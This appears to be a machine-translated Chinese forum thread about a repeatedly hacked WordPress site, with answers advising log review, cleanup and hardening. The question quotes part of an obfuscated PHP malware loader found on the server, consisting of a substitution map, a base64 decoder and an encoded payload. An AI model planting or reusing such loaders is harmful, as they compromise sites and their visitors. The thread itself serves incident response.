我的wordpress网站上的ftp服务器上的文件损坏

Question

我负责Wordpress网站。 1年前，该网站已被黑客入侵。 当有人通过键入URL在网站上进行连接时，他被重定向到另一个“假”网站。 我发现index.php中仅存在一行以重定向到另一个站点。 我删除了该行，并恢复了我的ftp服务器。 在此之前，我注意到ftp服务器上有一些可疑文件，但我没有创建这些文件，并且有一些晦涩的php和js代码，并带有一些随机字符。

最近，除非我们在网站上进行连接时只有空白页，否则该网站也有同样的问题。 我再次还原了该站点。 在此之前，我注意到ftp服务器上有一些可疑文件，但我没有创建这些文件，并且其中包含一些晦涩的php和js代码，并带有一些随机字符。

所有文件的删除日期几乎相同，我无权从服务器删除它们。 我认为这些漏洞来自这里，但我在互联网上找不到任何类似的案例。 有人知道吗？ 我只是在寻找一些已知的信息，目前我无法访问该网站。

编辑：

我有这种文件：

    <?php
$vHMX55W = Array('1'=>'C', '0'=>'j', '3'=>'U', '2'=>'x', '5'=>'F', '4'=>'s', '7'=>'q', '6'=>'P', '9'=>'T', '8'=>'y', 'A'=>'5', 'C'=>'e', 'B'=>'G', 'E'=>'f', 'D'=>'a', 'G'=>'1', 'F'=>'2', 'I'=>'7', 'H'=>'m', 'K'=>'X', 'J'=>'n', 'M'=>'c', 'L'=>'E', 'O'=>'v', 'N'=>'M', 'Q'=>'i', 'P'=>'Q', 'S'=>'g', 'R'=>'O', 'U'=>'A', 'T'=>'I', 'W'=>'h', 'V'=>'N', 'Y'=>'S', 'X'=>'t', 'Z'=>'6', 'a'=>'3', 'c'=>'Z', 'b'=>'w', 'e'=>'R', 'd'=>'k', 'g'=>'9', 'f'=>'z', 'i'=>'J', 'h'=>'4', 'k'=>'V', 'j'=>'D', 'm'=>'0', 'l'=>'d', 'o'=>'u', 'n'=>'W', 'q'=>'8', 'p'=>'b', 's'=>'l', 'r'=>'Y', 'u'=>'K', 't'=>'H', 'w'=>'r', 'v'=>'L', 'y'=>'p', 'x'=>'o', 'z'=>'B');
function v9PSABL($vMCS1QU, $vDG7FSU){$v4ZU9QC = ''; for($i=0; $i < strlen($vMCS1QU); $i++){$v4ZU9QC .= isset($vDG7FSU[$vMCS1QU[$i]]) ? $vDG7FSU[$vMCS1QU[$i]] : $vMCS1QU[$i];}
return base64_decode($v4ZU9QC);}
$vW073GA = 'DnrxDKVfcKPxi5g9ekinekTyuPyI1SddKGV53sc53s4J3LWPKGV59Lr'.
'JKYUgT1TOT04S1SddKGV53sc53s4J3dkV9Ge5Km5Le5TJKYUgT1T2N0MoN1hbv0LQRbxiDn'.
'rxTnkXMteAu1eE3mkYkdkYn8lTk5ePKGWEedgYkm5YeLkLKmc63QlluYdu1K4u1PddKGV53sc53s4JY5'.
'e335grKmc63slz3de5e5gB9GTJKYUgT1T2N0MoN1hbv0LQRbxiEPyg1SyycQWyMaVsl1SdKmci9Lk9uYduCbxicHg8cn50D1S'.
'dKmci9Lk9TB5fT1ewcKdS69hSiBcypB3y1SsI1SdiDnrxTKVmMJzOM8SdcHs4ck4JpH5XcYllv1UQvHybc8TyuPxi1K4u1PdiiBc'.
'ypBkornGsTjmSrn2mcKiEpn50MHgfu1eHDn2sn8lornGsiGmyRbxi1PddcHs4cnAWpn3S6YzolnGEpn50MHgfu1eHDn2spH5XcYd'.
'I1Sdi1YeHDn2spH5XcYUgTtWolnGEpn50MHgfu1eHDn2spH5XcYdI1Sdi1YeEedsNekVp'.
'iBXsCkGpTHAWpn3QKYUgT1eHDn2spH5Xc94u1Psg1Ssg1Jmu1PyHlnA0lBsOpQz0lKVmp'.
'FGEMae8DKzElB5JM8SdlBkhl1duCbxST1USitesCtPS6YzfltiyM5gmrnlfu1'.
'emcKWmv1UJ6BL+i8dI1SxST1USitesCtPS6YzfltiEMHkbpB50cYSQ6BLSDtisc0GMTQT4T1ipT1T4T1emcKWmu94uT1UST1e'.
'mcKWmTjmSMae8KaisMB2WrF3xT0bOr9hQv1UQTQbSitesCtPyRbxST1USitesCtPS6Yzflti'.
'EMHkbpB50cYSQK1T+TQbSTQzlT1T4T1emcKWmu94u1QUST1z8cKeGMHhSi'.
'tesCtPI1Jmu1HcGpHVmDngoTBsfKFsbu1efltTyTt4uT1z8cKeGMHhSMtiscGgXrKe0D1S'.
'QvGhxnfLXRkGqnfLXRkGpN1mAKKb2nfUXRkGpN1mAKKb8nfUXV5GpN1'.
'mAKKb8Vk4bv9kluYWMvQWpN1mAKK2pNYmAKk4bv9slEj5pN1mAKk4bv9slEjipN1mmKk4bv9slEjTGnf'.
'UXVkmyuK4fEYPOTQbdMae8u94uEPxucJkoraeypFhScJiOpkgxpaVmu1e0pFAmcnAmuPyI1SxST1USi'.
'BWOMaPS6YzbMHkJKaisMB2WrF3xi8gCutlala2HltUyK1hODYM4i8'.
'M4P1eE3mkYkdkYn8lTk5ePKmW63GPJKYdI1SxST1USDnrSuBsfKFsbu1expaVmuYduT1UST'.
't4uT1UST1UST1z8cKeGMHhSiBVOpJespJPI1QUST1zg1QUST1UuT1UST1empFXspJNS6YzsCtz4pFesu1iUTQbSiBVOpJespJPy'.
'RbxuT1UST1e0pFAmcnAmTjmSiteODFkoMG4bKYUoT1iUTQUoT1exp'.
'aVmT1hST0hQRbxuT1USTtisltk8pQUdrFgolBkolj4uEPxucJkoraeypFhSrn2mcKiEpn50MHgfu1e0pFAmcn'.
'AmuPyI1QUST1zbMHkJKFGWlBVxKF54p1SJTa4xvQxyEYVkDYM4T1e0pFAmcnAmv1Udpn5mr'.
'FWsM8dI1SxST1UScHg8u1eyTjmSNj4SiBdS61z0pakol1Sdpn5mrFWsMG'.
'42KYdIT1eyu84y1QUST1zI1SxST1UST1UST1eoM8UgTBkhMB2OcB3xTJbQv1Udpn5mrF'.
'WsMG42Kk4dDkmyRbxST1UST1UST1e0NQUgTBVOlnAmu1eoM8dI'.
'1QUST1UST1USitiWpHPS6Yz8rnAdujU4T1SdrfTSvYU2uYdI1QUST1UST1USiBVOpJespJPS6Yz'.
'fltiEMHkbpB50cYSQC8ToiBGWlBVxcKVpNkGpiBslvQigTQbSiBAfn8'.

有人知道这是什么吗？

Answer 1

这是非常广泛的。 在网站上，实际上有数百万种可能的攻击媒介。 您受到攻击的事实本身并不意味着这些可能性比任何其他可能性都要大。

由于您在发生攻击时有一个时间戳，因此请检查服务器日志，以获取有关引导程序的线索。 当时有SFTP访问吗？ 合法用户的密码可能已泄露。 当时有HTTP访问吗？ 插件可能存在漏洞，需要禁用或升级。

攻击者只需一个漏洞即可访问该站点。 这可能是显而易见的（例如，如果您从已知的用户帐户中看到SFTP活动），或者可能需要进行大量研究才能确定发生了什么以及如何发生。

Answer 2

这很简单：您被黑了。

忘记尝试模糊化php文件； 他们可能会告诉您文件的用途，但不会告诉您文件是如何到达的。 全部删除。

除非您仔细分析服务器日志并检查所有插件和主题是否存在漏洞，否则您将找不到利用向量。 而且该矢量可能是您自己的PC / mac上的恶意软件，它们窃取了凭据。

解决方法很简单：按照常见问题解答仔细清理网站和托管帐户。 我的网站被黑-WordPress Codex。 扫描您自己的PC / Mac以及用于访问WordPress管理员和托管帐户的任何计算机。

如果这是您自己的服务器，则也需要对其进行加固。 尝试在https://serverfault.com/上搜索有关您的操作系统以及如何保护和加固它的信息。

并在强化WordPress-WordPress Codex和蛮力攻击-WordPress Codex中查看WordPress本身推荐的安全措施

Answer 3

当您说您无权删除它们时，您不是在管理网站吗？ 如果您没有完全的管理权限，则应与任何人联系并说明情况，以便他们可以立即处理，或至少使您能够这样做。

您知道该网站是如何被第一次和第二次入侵的吗？ 显然，有一个漏洞需要解决。

留下了什么样的文件？ 除了找到“晦涩”的代码之外，您还能进一步检查/解释其内容吗？